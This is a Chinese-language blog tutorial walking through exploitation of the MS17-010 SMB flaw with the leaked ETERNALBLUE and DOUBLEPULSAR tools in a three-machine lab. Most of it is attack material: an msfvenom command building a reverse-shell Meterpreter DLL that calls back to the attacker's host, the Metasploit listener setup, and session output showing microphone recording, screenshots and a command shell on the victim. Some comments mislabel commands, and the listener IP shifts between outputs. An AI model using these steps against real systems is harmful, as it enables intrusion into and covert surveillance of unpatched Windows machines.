ETERNALBLUE工具测试与MS17-010漏洞利用

scadm 2021年4月25日00:44:20
评论
2,958 2067字

ETERNALBLUE工具测试与MS17-010漏洞利用

最近一段时间网络又发生了一次大地震,Shadow Brokers再次泄露出一份震惊世界的机密文档,其中包含了多个精美的 Windows 远程漏洞利用工具,可以覆盖大量的 Windows 服务器,一夜之间所有Windows服务器几乎全线暴露在危险之中,任何人都可以直接下载并远程攻击利用。

目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

而Shadow Brokers也在推特上面放出了保留部分文件,下载地址:shadowbroker

这次的文件有三个目录,分别为“Windows”、“Swift” 和 “OddJob”,包含一堆令人震撼的黑客工具。本文要写的就是利用ETERNALBLUE工具进行攻击。

0x01  环境准备

准备三台机器:两台攻击机器windows 7和kali,一台目标机器windows 7

首先在攻击机器windows7中安装配置python和pywin32。

1、python-2.6 32位 :python-2.6.6_x_32.msi 安装完成后并配置环境变量;

2、pywin32 :pywin32-221.win-amd64-py2.6.exe

3、因为0day工具包里面代码的原因,需要在windows目录下新建一个listeningposts目录(不是c盘根目录的windows),空的就好,不需要再去注释文件。

环境搭建好后,运行windows目录下的fb.py脚本,正常显示即可。

0x02 漏洞利用

1、在kali下配置msf的payload:

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.30 LPORT=6666 -f dll > /opt/test.dll   ##LHOST为kali机器IP,命令生成dll文件保存在/opt路径下

2、把上面生成的dll文件放在windows攻击机器的C盘根目录下,

3、在kali中开启msfpaylod监听

$ msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.0.30
msf exploit(handler) > set lport 6666
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 172.16.0.30:6666
[*] Starting the payload handler...

4、在windows攻击机器上运行fb.py脚本

ETERNALBLUE工具测试与MS17-010漏洞利用

5、设置目标机器IP

ETERNALBLUE工具测试与MS17-010漏洞利用

6、创建一个新项目(如果是第一次运行是没有下图中的test项目的)

ETERNALBLUE工具测试与MS17-010漏洞利用

7、利用eternalblue漏洞

ETERNALBLUE工具测试与MS17-010漏洞利用

8、Eternalblue配置(需要注意的几个配置如下图,其它一路回车)

ETERNALBLUE工具测试与MS17-010漏洞利用

9、Eternalblue漏洞利用成功

ETERNALBLUE工具测试与MS17-010漏洞利用

10、利用Doublepulsar漏洞

ETERNALBLUE工具测试与MS17-010漏洞利用

11、配置Doublepulsar(除了下图中需要修改的地方,其它一路回车)

ETERNALBLUE工具测试与MS17-010漏洞利用

ETERNALBLUE工具测试与MS17-010漏洞利用

12、攻击成功

当执行成功后,在kali机器界面就成功连接了目标机器,我们就可以在目标机器上查看文件,截图等等。按ctrl+z即可退出连接。

[*] Started reverse handler on 192.168.0.30:6666
[*] Starting the payload handler...
[*] Sending stage (1105970 bytes) to 192.168.0.40
[*] Meterpreter session 2 opened (192.168.0.30:6666 -> 192.168.0.40:52187) at 2017-04-28 07:35:45 +0000
meterpreter >

13、桌面截图

meterpreter > webcam_list     ##启动webcam录屏工具
1: Citrix HDX Web Camera
meterpreter > record_mic    ##录制屏幕
[*] Starting...
[*] Stopped
Audio saved to: /usr/bin/tmshuzXf.wav    ##保存路径
meterpreter > screenshot    ##截图
Screenshot saved to: /usr/bin/FgNesEUj.jpeg   ##保存路径
meterpreter >

14、进入机器查看文件

meterpreter >shell  ##输入shell命令就可以进去目标机器了
Process 924 created.
Channel 1 created.
Microsoft Windows 7
C:Windowssystem32>cd c:
cd c:
c:>
继续阅读
scadm
  • 本文由 发表于 2021年4月25日00:44:20
  • 转载请务必保留本文链接:https://www.wscyun.com/1124
Windows RDP漏洞检测方法(CVE-2019-0708) 安全漏洞

Windows RDP漏洞检测方法(CVE-2019-0708)

CVE-2019-0708漏洞出来也一段时间了,网上也放出了挺多的漏洞检测工具,我大概整理了两份检测方法,分别是360提供的用于在window环境执行和github上提供的用于在kali环境执行。 0...
CVE-2019-0708漏洞利用 安全漏洞

CVE-2019-0708漏洞利用

0x00 漏洞背景 2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。 此漏洞是预身份验证且无需用户交互,这就意...
Linux XOR.DDoS入侵排查步骤 安全漏洞

Linux XOR.DDoS入侵排查步骤

0x00 病毒详情 XOR.DDoS类型病毒主要特点,用暴力猜解目标机器ssh弱密码的方式,入侵目标机器,然后执行相应的shell脚本,安装病毒到目标机器,将目标机器变为DDoS肉鸡,然后病毒利用多线...
git泄露利用的脚本-GitHack 安全漏洞

git泄露利用的脚本-GitHack

当运维或者开发使用自动部署的方式,如果配置不当,会将.git文件夹直接部署到线上环境,造成git泄露漏洞。 这边推荐一个利用脚本--GitHack。是一个.git泄露利用测试脚本,通过泄露的文件,还原...